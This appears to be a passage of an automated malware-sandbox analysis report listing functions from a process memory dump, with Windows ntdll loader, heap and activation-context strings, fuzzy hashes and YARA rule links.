Process initialization failed with status 0x%08lx, xrefs: 01A8413A
Delaying execution failed with status 0x%08lx, xrefs: 01A84258
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 01A840D8
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 01A841FE

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 8fbf175dd625641c013fc9dbf60e798ac72e98409783c836ffb0ed84153346f7
Instruction ID: 28c934ea2ab2f744597732b704a67d02352fb01b035478bc22a448425bd9791a
Opcode Fuzzy Hash: 8fbf175dd625641c013fc9dbf60e798ac72e98409783c836ffb0ed84153346f7
Instruction Fuzzy Hash: 27915D70B04316DBEF36EF58DA48BAA7BF1BF95B24F04011DD9086B682E7749841CB91

Function 01A4C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeImportRedirection, xrefs: 01A88177, 01A881EB
minkernel\ntdll\ldrinit.c, xrefs: 01A4C6C3
Loading import redirection DLL: '%wZ', xrefs: 01A88170
minkernel\ntdll\ldrredirect.c, xrefs: 01A88181, 01A881F5
LdrpInitializeProcess, xrefs: 01A4C6C4
Unable to build import redirection Table, Status = 0x%x, xrefs: 01A881E5

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: c170d76111e673c651878384c12e782709c8d4c8cac7c372d30c825cd563eed9
Instruction ID: f7c5c71a11d60b790200f3d1af3bfdf67e8c2e61fc36c8cab42341fc6cd741b6
Opcode Fuzzy Hash: c170d76111e673c651878384c12e782709c8d4c8cac7c372d30c825cd563eed9
Instruction Fuzzy Hash: E23107716443429FC325EF28DA49E1AB7D5FFD4B20F04451CF9896B291EB20ED04C7A2

Function 01A42674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01A82180
RtlGetAssemblyStorageRoot, xrefs: 01A82160, 01A8219A, 01A821BA
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01A82178
SXS: %s() passed the empty activation context, xrefs: 01A82165
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01A8219F
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01A821BF

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 5495f0343b57fcb2be7d43ccc7235e3ed3a4bfff2ff7ad411650d1608111ca43
Instruction ID: 5febc21dc7a42549a415b6012f165fe6adf2916b9ebf51f3c11d8c5a77436698
Opcode Fuzzy Hash: 5495f0343b57fcb2be7d43ccc7235e3ed3a4bfff2ff7ad411650d1608111ca43
Instruction Fuzzy Hash: 2031C73AB403157BEB21DA9A9C81F6A7E78DFD5A90F19405FBB08B7140D2709A41C7A1

Function 01A20770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 01A750CA
HEAP[%wZ]: , xrefs: 01A750AE
HEAP: , xrefs: 01A750BD

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 2b26088168923aecb632faa0161d7036fa4d5911aad16437bb124752afac6bb7
Instruction ID: ffc41200425ca598e4b9900cb7dda593e6a54442b86fd2ca9650ef30f368c941
Opcode Fuzzy Hash: 2b26088168923aecb632faa0161d7036fa4d5911aad16437bb124752afac6bb7
Instruction Fuzzy Hash: 74F18D70B00616DFEB16CF6CCA94B6AB7B5FF44304F148169E5169B391D734EA81CB90

Function 01A30BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A30CDC

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01A7A121
LdrpCheckModule, xrefs: 01A7A117
Failed to allocated memory for shimmed module list, xrefs: 01A7A10F

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: b7306ceee061ac17227b3256988e8c143ae2348d412e40e92c8ec164f8afeb1a
Instruction ID: d5e5d7b1ab40bf3eccf5754cf1f495894cca087c10999cafabf8ab0bbecbf34c
Opcode Fuzzy Hash: b7306ceee061ac17227b3256988e8c143ae2348d412e40e92c8ec164f8afeb1a
Instruction Fuzzy Hash: D771AD71A00205EFDB2ADF68CA85BBEB7F4EB94704F18442DE906D7255E734AA42CB50

Function 01A4C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A4C7BF

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01A882E8
LdrpInitializePerUserWindowsDirectory, xrefs: 01A882DE
Failed to reallocate the system dirs string !, xrefs: 01A882D7

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: 8c54e82e59b44ca256e12d34efdda2a148c7b8f86667962b6a4128122ec5c612
Instruction ID: efac098134c11874b525b7b97f3e19c70d397ccfa460d972d4a61a489540aec6
Opcode Fuzzy Hash: 8c54e82e59b44ca256e12d34efdda2a148c7b8f86667962b6a4128122ec5c612
Instruction Fuzzy Hash: 61413471545301ABD732EB68DD40B9B7BE8EFA8760F00452AF94CD32A5EB74D800CB91

Function 01A94755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A94809

Strings

LdrpCheckRedirection, xrefs: 01A9488F
minkernel\ntdll\ldrredirect.c, xrefs: 01A94899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A94888

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 4f36051fec2813b577d5d47e4567bc1824e1ff3f8c9f3b53c035bb99572ac58c
Instruction ID: c7098fdaa461e9d9b3e4e1c66db9937fdbb281f328c5ce042ed05a52f9b00140
Opcode Fuzzy Hash: 4f36051fec2813b577d5d47e4567bc1824e1ff3f8c9f3b53c035bb99572ac58c
Instruction Fuzzy Hash: AD41E232A047519FCF22CF6DDA40A2A7BE4AF8DA50F09455DED48DB311D730D882CB81

Function 01A5096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01A52DF0: LdrInitializeThunk.NTDLL ref: 01A52DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A50BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A50BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A50D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A50D74

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: a12be1f2cb6307c13dd973e3d6e339f51a7de7f86b436cd0e3a89d527448239c
Instruction ID: d9638875fcb603fb68a4a225f2ac54d6723157b17a25c988ad97fc8b4089b0fb
Opcode Fuzzy Hash: a12be1f2cb6307c13dd973e3d6e339f51a7de7f86b436cd0e3a89d527448239c
Instruction Fuzzy Hash: DC427C71900715DFDB61CF28C980BAAB7F4FF44314F1445AAE989EB241E770AA84CF60

Function 01AEB16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01AEB329
RtlDebugPrintTimes.NTDLL ref: 01AEB605

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: c73f6a480a9d469f8ee6a72cc77f6a77f48eaa99edaa35cf870e4fd263cd3638
Instruction ID: a585c700d2682aa76a3d77e07ce664b6db3bc0c99a889832b6ae2f9a553ca27e
Opcode Fuzzy Hash: c73f6a480a9d469f8ee6a72cc77f6a77f48eaa99edaa35cf870e4fd263cd3638
Instruction Fuzzy Hash: 78F11772E006118FCB18CF6DC9A967EFFF5AF98210719416DD856EB381E634EA41CB60

Function 01A104E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A1055E

Strings

kLsE, xrefs: 01A10540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01A1063D

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: 1d2255ebbdfc440ebc492f0a20be2f06f074435e55823e1234b60696560d86e8
Instruction ID: 36b377f57b605e93491250e70dfd74eeabdb32af8b198d17ad32164ffcd8bea9
Opcode Fuzzy Hash: 1d2255ebbdfc440ebc492f0a20be2f06f074435e55823e1234b60696560d86e8
Instruction Fuzzy Hash: D351AE715047428BD725EF78C6406A7BBE4AF84314F148C3EFAAA87245E770D985CB92

Function 01A1A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 01A1A3F7
8, xrefs: 01A1A3E7
LdrResFallbackLangList Exit, xrefs: 01A1A3FF
LdrResFallbackLangList Enter, xrefs: 01A1A3EF

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 196848676126e7acc264bee35a4fa4fff586b9842b906c87b003db0e93c2a14f
Instruction ID: 60e38c15329d025118391300acc034854e5cb67555c328dfc5a9e87efef95600
Opcode Fuzzy Hash: 196848676126e7acc264bee35a4fa4fff586b9842b906c87b003db0e93c2a14f
Instruction Fuzzy Hash: FEC19C74209382CFD711CF68C544B6ABBF4BF84714F08486AF996CB25AE734CA49CB56

Function 01A48402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A4855E
minkernel\ntdll\ldrinit.c, xrefs: 01A48421
@, xrefs: 01A48591
LdrpInitializeProcess, xrefs: 01A48422

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 744f0750148bb4500ded6649c1dc65b54f2b3be50ecb889274b3f120248cf735
Instruction ID: 2b50ec2e9a80a9f37d8f0e9f5f31af73e900706c071886dee80b4bde1fa63c45
Opcode Fuzzy Hash: 744f0750148bb4500ded6649c1dc65b54f2b3be50ecb889274b3f120248cf735
Instruction Fuzzy Hash: 42919D71508345AFD722EF65DD40FABBBE8BF84744F40492EFA8492151E338D944CBA2

Function 01A4273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 01A428D8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01A821D9, 01A822B1
SXS: %s() passed the empty activation context, xrefs: 01A821DE
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01A822B6

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 44139a5a679f9a1f482015eef20e4f4fce553f00245771b1594f8d3fa2ac6e26
Instruction ID: 4a0cbf5a5c293e531bb3acc0cd5561d5e74cacac26a2df7385a07f04219f45cc
Opcode Fuzzy Hash: 44139a5a679f9a1f482015eef20e4f4fce553f00245771b1594f8d3fa2ac6e26
Instruction Fuzzy Hash: 58A1A135940229DFDB25DF68DC84BA9B7B1BF98354F1541EAE908E7252E7309E80CF90

Function 01A44AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01A83456
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01A83437
RtlDeactivateActivationContext, xrefs: 01A83425, 01A83432, 01A83451
SXS: %s() called with invalid flags 0x%08lx, xrefs: 01A8342A

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 7bb11320ff7533f5c05664bf27f8d3ef383c081bac01699d3d3fdbb754d4fa9a
Instruction ID: e08a9587fc0aa36d1872bffb0e252fd720965c5f1369b4e033b345bd7150ee37
Opcode Fuzzy Hash: 7bb11320ff7533f5c05664bf27f8d3ef383c081bac01699d3d3fdbb754d4fa9a
Instruction Fuzzy Hash: E3612236600712ABDB22DF1DC841B2ABBE5BFC8B11F19852DE9559B242D734E801CB95

Function 01A164AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A710AE
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A7106B
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A71028
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A70FE5

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: c7f71ed7186ae1da267e50edf1971a95830d24bf727dde1bd911dd1fc67bc8b8
Instruction ID: 8e7a78d8da4d06600b12188a83b13799bc253ab9b8b67bb0e97b8b5142ecb119
Opcode Fuzzy Hash: c7f71ed7186ae1da267e50edf1971a95830d24bf727dde1bd911dd1fc67bc8b8
Instruction Fuzzy Hash: 9D71D2B1908305AFCB21DF28CA84B9B7FA9AF55764F040468FD498B18AD774D588CBD2

Function 01A229A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01A23255
HEAP: , xrefs: 01A23264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01A2327D

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 6e88a9c7c665acd93075ae7d70ccb2710472bb3f439e7220fd3a98e34d958a3e
Instruction ID: 5187ef934e33840aaa61e8962a7a715fea8d493489ecb18f49a4f81409bda3a0
Opcode Fuzzy Hash: 6e88a9c7c665acd93075ae7d70ccb2710472bb3f439e7220fd3a98e34d958a3e
Instruction Fuzzy Hash: D192AB70A042699FDF25CF6CC540BAEBBF1BF49300F18809AE999AB351D739A945CF50

Function 01A36962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 01A36C24
, xrefs: 01A7CA51

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: 2ad76edabd761f094fda1de4d092216807ba7214de056fecfbcc976d79822cfc
Instruction ID: 3d53f9764fd8a94e619ee92566b22152b6a5425e19c6e70e82b7dfea500ec14c
Opcode Fuzzy Hash: 2ad76edabd761f094fda1de4d092216807ba7214de056fecfbcc976d79822cfc
Instruction Fuzzy Hash: 5BC28FB16083419FEB25CF68C881BABBBE5AFC8754F08892DF989C7241D734D945CB52

Function 01A0A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 01A6C2E6
UseFilter, xrefs: 01A0A1C1
\??\, xrefs: 01A6C1E4

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: d01e2aab7ec6eacc6b1bba5f1b309746e474378004cacbcab61dcc5cb48e81f9
Instruction ID: 3caf99f2b12f510f71898d5a90fee1a7080433e9580473cfa30c26f5621e7ce5
Opcode Fuzzy Hash: d01e2aab7ec6eacc6b1bba5f1b309746e474378004cacbcab61dcc5cb48e81f9
Instruction Fuzzy Hash: D9A16D719112299BDB31DF68CD88BEAB7B8EF48710F1141EAEA09A7250D7359E84CF50

Function 01A20A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 01A7534D
HEAP[%wZ]: , xrefs: 01A75335
HEAP: , xrefs: 01A75342

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 3f2a2ea68a257d353d132683a027081ae57142c2cda3c0d87871e3a82e19f511
Instruction ID: 90b67dc2d63af7f5e805edf1dcdc62d170a7a43d48391239ddd8de997ba37e3d
Opcode Fuzzy Hash: 3f2a2ea68a257d353d132683a027081ae57142c2cda3c0d87871e3a82e19f511
Instruction Fuzzy Hash: AC61AE70600316DFDB29CF28CA94B6ABBF1FF45704F18855AE45A8F292D770E981CB91

Function 01ACC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 01ACC1F1
PreferredUILanguages, xrefs: 01ACC212
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01ACC1C5

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
